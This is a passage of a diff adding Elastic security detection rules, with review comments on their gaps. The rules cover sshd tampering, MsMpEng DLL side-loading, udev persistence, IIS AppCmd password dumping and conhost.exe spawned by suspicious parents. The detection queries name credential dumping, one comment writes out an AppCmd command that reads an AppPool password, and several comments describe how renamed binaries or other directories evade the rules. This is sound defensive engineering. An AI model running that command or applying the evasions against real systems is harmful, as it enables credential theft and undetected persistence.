If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + 
"name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "0415f22a-2336-45fa-ba07-618a5942e22c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json new file mode 100644 index 00000000000..544aa123d81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json 
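Review bot: The `setup` text says this rule accepts data from either Elastic Defend or Auditbeat and walks through an Auditbeat install, but `index` is only `logs-endpoint.events.*` and `endgame-*`, so Auditbeat file-integrity events are never searched and the `Data Source` tags do not list Auditbeat either; either add `"auditbeat-*"` to `index` (plus a matching tag) or drop the Auditbeat section from `setup`. Separately, the allowlist is keyed on `process.name` alone (`dnf`, `dpkg`, `rpm`, `yum`, …), so a binary copied anywhere and named `dpkg` can overwrite `/usr/sbin/sshd` without firing; pinning those package managers to their install paths via `process.executable`, as the `/usr/share/elasticsearch/*` exclusion already does, would close that gap. Also, matching only `event.type:change` may miss a replacement done by writing a new file and renaming it over the original, if the sensor reports that as a creation/rename rather than a change — worth confirming against Elastic Defend test data before relying on it.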
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Dennis Perto" + ], + "description": "Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes.", + "false_positives": [ + "Microsoft Antimalware Service Executable installed on non default installation path." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n)\n", + "references": [ + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "053a0387-f3b5-4ba5-8245-8002cca2bd08_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json new file mode 100644 index 00000000000..4da767e61b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json 
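Review bot: `process.pe.original_file_name` is referenced without the optional-field marker, whereas the AppCmd rule further down this diff writes `?process.pe.original_file_name`; with `winlogbeat-*` and `endgame-*` in `index`, an index pattern where that field is unmapped may cause the EQL query to fail verification rather than simply skip the branch (this depends on the stack version, so confirm), and the consistent form costs nothing: `(?process.pe.original_file_name == "MsMpEng.exe" and not process.name : "MsMpEng.exe") or`. The `setup` section only covers the `event.ingested` fallback and could also state that the first branch needs a source that populates PE metadata (Sysmon or Elastic Defend), otherwise only the path-based branch is effective.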
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Dennis Perto" + ], + "description": "Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes.", + "false_positives": [ + "Microsoft Antimalware Service Executable installed on non default installation path." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n)\n", + "references": [ + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "053a0387-f3b5-4ba5-8245-8002cca2bd08_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json new file mode 100644 index 00000000000..c361e1bad70 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json 
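Review bot: The `tags` array carries `"Tactic: Execution",` but `threat` maps only TA0005 Defense Evasion / T1574.002, so the Execution tag has no corresponding ATT&CK entry and is likely to mislead tag-based filtering and coverage reporting; either add the Execution tactic to `threat` or remove that tag line. The same mismatch exists in the `_109` copy of this rule above. Otherwise the only difference from `_109` is narrowing `logs-endpoint.events.*` to `logs-endpoint.events.process-*`, which is consistent with the `process where` query.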
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the creation of rule files that are used by systemd-udevd to manage device nodes and handle kernel device events in the Linux operating system. Systemd-udevd can be exploited for persistence by adversaries by creating malicious udev rules that trigger on specific events, executing arbitrary commands or payloads whenever a certain device is plugged in or recognized by the system.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Systemd-udevd", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:\"linux\" and event.category:\"file\" and\nevent.type:(\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path:/lib/udev/* and process.executable:* and not (\n process.name:(\"dockerd\" or \"docker\" or \"dpkg\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"systemd-hwdb\" or\n \"podman\" or \"buildah\") or file.extension : (\"swp\" or \"swpx\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "054db96b-fd34-43b3-9af2-587b3bd33964", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### 
Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "054db96b-fd34-43b3-9af2-587b3bd33964_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json new file mode 100644 index 00000000000..d6ecc600a2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json 
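Review bot: `file.path:/lib/udev/*` does not cover the directories where udev rules are most commonly dropped for persistence — `/etc/udev/rules.d/` and `/run/udev/rules.d/` are missed entirely — and on merged-/usr distributions the sensor may report the canonical `/usr/lib/udev/...` path rather than the `/lib` symlink, so even the vendor directory can be missed; confirm how Elastic Defend reports paths through the `/lib -> usr/lib` symlink before relying on this. A broader match would be `file.path:(/lib/udev/* or /usr/lib/udev/* or /etc/udev/rules.d/* or /run/udev/rules.d/*)`, with `file.path` already among the `new_terms_fields` to keep noise down. Also, the exclusion list is keyed on `process.name` only, so an attacker-controlled binary named `dpkg` or `systemd-hwdb` bypasses the rule; since `process.executable` is required (`process.executable:*`), the exclusion could be pinned to known install paths instead.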
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Service Account Password Dumped", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details 
on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "0564fb9d-90b9-4234-a411-82a546dc1343_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json new file mode 100644 index 00000000000..2de0c56166f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json 
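Review bot: With `logs-system.security*` in `index`, this rule relies on Windows Security 4688 events carrying the command line, which they only do when the "Include command line in process creation events" audit policy is enabled; on hosts that ship only Security logs, `process.args` will otherwise be empty and the rule silent, so the `setup` section should state that prerequisite next to the existing `event.ingested` caveat. Suggested addition to `setup`: `- For logs-system.security* data, enable "Include command line in process creation events" so 4688 events populate process.args.` The `related_integrations` list already names `system`, so the caveat belongs here rather than in a separate guide.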
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Service Account Password Dumped", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more 
details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0564fb9d-90b9-4234-a411-82a546dc1343_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json new file mode 100644 index 00000000000..891e73f0b55 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json 
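Review bot: `process.args : "/list"` requires an argument that literally starts with a slash, while AppCmd's verb is normally written `list` (as in `appcmd list apppool /text:processmodel.password`), so unless AppCmd also accepts `/list` the canonical invocation from the referenced NetSPI post would not match — worth confirming with a test run before this version ships. The `/text*password` clause also only fires when the attribute name is spelled out; to my knowledge `/text:*` (all attributes) exposes the same value without matching. If the `/list` concern holds, `process.args : ("list", "/list") and process.args : ("/text*password", "/text:*")` covers the documented forms; if not, adding `"/text:*"` alone is still worthwhile. This file differs from the `_109` copy above only in the narrowed `logs-endpoint.events.process-*` index.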
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Conhost Spawned By Suspicious Parent Process", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\", \"dllhost.exe\", \"rundll32.exe\",\n \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\", \"ctfmon.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : (\"?:\\\\Windows\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\",\n \"?:\\\\WINDOWS\\\\system32\\\\PcaSvc.dll,PcaPatchSdbTask\",\n \"?:\\\\WINDOWS\\\\system32\\\\davclnt.dll,DavSetCookie\"))\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule 
to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + 